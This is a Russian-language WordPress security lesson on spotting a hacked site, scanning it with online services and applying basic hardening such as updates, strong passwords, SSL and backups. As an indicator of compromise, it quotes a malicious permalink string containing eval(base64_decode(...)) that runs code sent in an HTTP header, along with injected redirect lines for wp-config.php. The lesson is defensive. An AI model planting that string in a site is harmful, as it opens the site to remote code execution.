Проверка безопасности. Предварительные настройки

Здравствуйте! Спасибо за интерес и Добро пожаловать на мой курс Безопасный Вордпресс за 2 вечера.

В этом курсе вы настроите мощную автоматическую защиту сайта уровня премиум-плагинов.
Перед тем, как вы начнете настраивать защиту, прочитайте и примените все, что написано в этом уроке.

Содержание:

• Проверка безопасности
  1. Признаки взломанного сайта
  2. Проверьте сайт он-лайн сервисами
• Предварительные настройки
  1. Обновите софт до последней версии
  2. Используйте сложные логины и пароли
  3. Используйте только проверенный софт
  4. Установите плагин защиты от спама
  5. Отключите галочку Любой может зарегистрироваться
  6. Используйте надежный хостинг
  7. Используйте SSL
  8. Проверьте версию PHP
  9. Проверьте Здоровье сайта
• Дополнительные настройки
  1. Настройте бэкап
  2. Подключите сайт к CDN

Проверка безопасности

Первое, что нужно сделать — проверьте сайт, может быть он уже взломан:

1. Признаки взломанного сайта
2. Проверьте сайт он-лайн сервисами

Признаки взломанного сайта

1. Постоянные ссылки. Зайдите в Настройки — Постоянные ссылки. Проверьте, что ничего не добавлено к постоянной ссылке. Постоянная ссылка должна выглядеть как %postname%. Если ссылка изменилась на %postname%/%, например,

 %postname%/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/ 

значит, ваш сайт взломали.

2. Непонятный контент: Контент, который вы не размещали, — рекламные баннеры, новые статьи или страницы, и тому подобное. Проверьте все страницы сайта, начиная с Главной.

3. Поисковики: Проверьте свой сайт в поисках, нет ли в выдаче «виагры» вместе с вашим сайтом.

 site:ваш-сайт.ru 

Замените ваш-сайт.ru на ваш адрес.

Вставьте эту строку в поисковик, посмотрите, как поисковики видят ваш сайт. Некоторые взломы меняют заголовок страниц на рекламный мусор.

4. Неожиданные пики посещаемости: Хакеры используют взломанные сайты для редиректа на свои сайты. Если вы видите внезапное необъяснимое увеличение посещаемости, это может говорить о перенаправлении спам-трафика через ваш сайт на сайты хакеров.

5. Пользователи сайта: Проверьте пользователей сайта, нет ли неизвестных вам юзеров с правами администратора.

6. Файл .htaccess. Страницы сайта ведут на сайт с Виагрой, казино и тому подобное. Зайдите в свой файл .htaccess, проверьте, не добавились ли новые 301 редиректы. В новой установке Вордпресс файл должен выглядеть так:

7. Редиректы: Вредоносные редиректы с главной или другой / других страниц сайта. Вредоносный код мог быть добавлен в файл wp-config.php:

 define('WP_HOME', 'сторонний URL); 

или

 define('WP_SITEURL', 'сторонний URL'); 

8. Странные таблицы в базе данных: Хакеры могут получить доступ к базе данных и создать новую таблицу с вредоносным кодом, которая может быть похожа на стандартную таблицу Вордпресс. Например, создать новую таблицу wp_pagemeta, которая маскируется под стандартную таблицу wp_postmeta.

Проверьте сайт он-лайн сервисами

Еще один способ, которым вы можете найти взлом на сайте — просканировать сайт он-лайн сервисами.

• Google Transparency Report — проверка сайта в базе Google. Первый шаг, чтобы определить, был ли сайт взломан.
• Unmask Parasites — довольно простой сервис для проверки сайта.
• Sucuri Site Check — хороший сервис для поиска заражений на сайте. Показывает, внесен ли сайт в списки вредоносных сайтов. На данный момент 9 списков.
• Norton Safe Web – сканер сайта от Norton.
• Quttera – сканирует сайт на наличие вредоносного ПО.
• VirusTotal – крутейший сервис для сканирования сайтов, использует более 50 разных сканеров — Касперского, Dr.Web, ESET, Yandex Safebrowsing и других. Можно просканировать сайт, IP адрес или файл.
• WordPress Security Scan — проверяет основные уязвимости Вордпресс сайтов. Более глубокий анализ доступен по платной подписке.
• WebSicherheit – сканирует сайт на наличие вредоносного ПО, вирусов, внедренных скриптов и так далее.
• Pentest-Tools — еще один хороший сервис для проверки сайта на наличие заражения. В бесплатной версии доступен общий анализ сайта.
• 2ip — проверяет на вирусы и включение в черные списки Яндекса и Гугла.

Еще одна вещь, которую вы можете сделать — скачайте сайт на компьютер и проверьте его антивирусом.

• Как проверить сайт на безопасность
• Как проверить и вылечить от вирусов Вордпресс сайт

Предварительные настройки

После того, как вы проверили сайт, можно начинать настраивать его защиту. В этом разделе — обязательные настройки «здравого смысла», которые должны быть сделаны на любом сайте.

1. Обновите софт до последней версии

Новые версии Вордпресс выходят регулярно и содержат обновления безопасности, исправления багов и новые функции. Разработчики постоянно следят за появлением новых угроз и оперативно выпускают обновления безопасности.

Если вы пропускаете обновление, на вашем сайте не будет последних исправлений безопасности, то есть сайт будет содержать софт с известной уязвимостью, описание которой находится в открытом доступе. Это первый по популярности способ взлома сайта.

Хакбот придет на сайт и запросит версию ПО. Если в его базе данных найдется уязвимость этой версии ПО, он его взломает по уже известной методике.

Делайте ручное обновление Вордпресс, темы и плагинов в разделе Консоль — Обновления.

Или настройте автоматическое обновление софта:

• Автоматическое обновление Вордпресс, плагинов и тем
• Почему у вас должна быть последняя версия Вордпресс

2. Используйте сложные логины и пароли

Если вы используете стандартный логин, например, Admin, Administrator или имя вашего домена, и простые пароли (10.000 самых популярных паролей), то хакеры очень быстро взломают ваш сайт. Подбор стандартных логина и пароля — второй по популярности способ взлома сайта

После взлома хакер зайдет на сайт, создаст новый аккаунт администратора, будет публиковать контент, ссылки на другие сайты, начнет рассылку спама, и так далее. Он может удалить аккаунт старого администратора.

Придумайте пароль минимум из 12 символов, состоящий из строчных и заглавных букв, цифр и символов.

Генератор паролей в Вордпресс: Пользователи — Ваш профиль — Управление учетной записью

Пароль можно хранить в браузере, или пользоваться сервисом хранения паролей, например, LastPass.

Или вы можете создать свой пароль на основе какой-нибудь фразы, например, «Меня зовут Сергей Петров, у меня есть собака породы Пудель, который родился в 2016.»: MzSP,umespP,krv2016.

Также используйте сложные логины и пароли для аккаунтов, базы данных, е-мейла и хостинга, потому что это альтернативные способы зайти на сайт.

• Вход в админку Вордпресс

Еще одна вещь, которую вы можете сделать — проверить, что имя пользователя и логин разные. Зайдите в Пользователи — Ваш профиль.

Если имя пользователя и логин одинаковые, то хакер уже знает половину информации, чтобы зайти на сайт. Выберите другое имя в выпадающем списке Отображать как и нажмите Обновить информацию.

Вместо Very-strong-username у вас должен быть ваш уникальный сложный логин.

• Как изменить имя пользователя Admin в Вордпресс

3. Используйте только проверенный софт

Перед добавлением в репозитарий темы и плагины проверяет команда добровольцев. Они могут пропустить не очень хороший код, который может замедлять сайт или вызывать проблемы с безопасностью.

Даже если тема или плагин были одобрены как «Без серьезных нарушений», это не значит, что это хороший софт.

Одобренная тема или плагин может содержать уязвимость в безопасности, которую не нашел разработчик, через которую хакер может попасть на плагин, а затем на сайт.

Возможен и обратный вариант: например, пользователь оставил отзыв с одной звездой, потому что в плагине не было какой-то функции, хотя в описании к плагину подробно написано, какие функции в нем есть.

Поэтому оценка ниже 5 звезд не обязательно означает плохой софт.

Используйте регулярно обновляемые темы и плагины от известных разработчиков, с большим количеством отзывов и большим количеством установок. Для плагинов минимум 1.000, еще лучше 10.000 установок.

Удалите все неиспользуемые темы и плагины. Большое количество кода повышает вероятность найти в нем уязвимость.

4. Установите плагин защиты от спама

Спам — это не только надоедливый мусор, но и источник заразы. Установите плагин Kama Spamblock, это эффективное средство для защиты от спама. Плагин настраивать не нужно, просто установите и активируйте.

5. Отключите галочку Любой может зарегистрироваться

Проверьте чекбокс «Любой может зарегистрироваться» в разделе Настройки — Общие — Членство

6. Используйте надежный хостинг

Ненадежный хостинг хакер может взломать и добраться до вашего сайта. Используйте надежные хостинги из Топа хостингов: Hosting-ninja.ru, Hostdb.ru.

Я использую хостинг Beget. Обзор хостинга.

7. Используйте SSL

Безопасное соединение защищает данные, передаваемые посетителями сайта через Интернет. Установите бесплатный или платный сертификат, перед адресом сайта появится зеленый замóк и протокол передачи данных изменится с http на https.

Если у вас на сайте есть регистрация / авторизация пользователей или прием оплаты, то есть передача персональных данных, то вам необходимо установить SSL сертификат.

С 1 января 2017 года установленный SSL сертификат стал одним из факторов ранжирования сайтов Гугл.

На большинстве хостингов можно установить бесплатный SSL сертификат за пару кликов.

Если у вас появились сложности с установкой, читайте здесь, или поговорите с техподдержкой хостинга.

8. Проверьте версию PHP

Проверьте на хостинге, какая версия PHP (и MySQL) используется.

На данный момент Вордпресс рекомендует использовать PHP версии 7.4, MySQL версии 5.7.
Версии PHP и MySQL ниже 5.6 больше не поддерживаются, то есть небезопасны.

На всех хостингах это делается по-разному, на Бегет это делается выбором в выпадающем меню.

9. Проверьте Здоровье сайта

Зайдите на страницу Инструменты — Здоровье сайта.

Сделайте все улучшения с пометкой Безопасность.

Дополнительные настройки

Вы можете сделать еще несколько настроек: настроить бэкап и подключить сайт к CDN.

Настройте бэкап

Бэкап — важная часть безопасности любого сайта. Если что-то пойдет не так или сайт взломают, у вас всегда будет копия для восстановления.

• Бесплатные плагины: All-in-One WP Migration (ручной бэкап и восстановление),
  UpdraftPlus (автоматический бэкап на облако).
• Платные плагины: Duplicator Pro, VaultPress (от Automattic), BlogVault.

• Бэкап Вордпресс. Подробное описание

Подключите сайт к CDN

CDN — это сеть доставки контента. Суть этого сервиса в том, что ваш сайт копируется на несколько серверов в географически разных точках. Когда посетитель запрашивает какую-то страницу сайта, он ее получает не с вашего хостинга, а из ближайшего сервера CDN. Это увеличивает скорость загрузки сайта.

• Что такое CDN

Хотя CDN скорее относится к производительности сайта, у CDN CloudFlare есть несколько настроек безопасности, которые будут полезными на вашем сайте.

• Как подключить CloudFlare к Вордпресс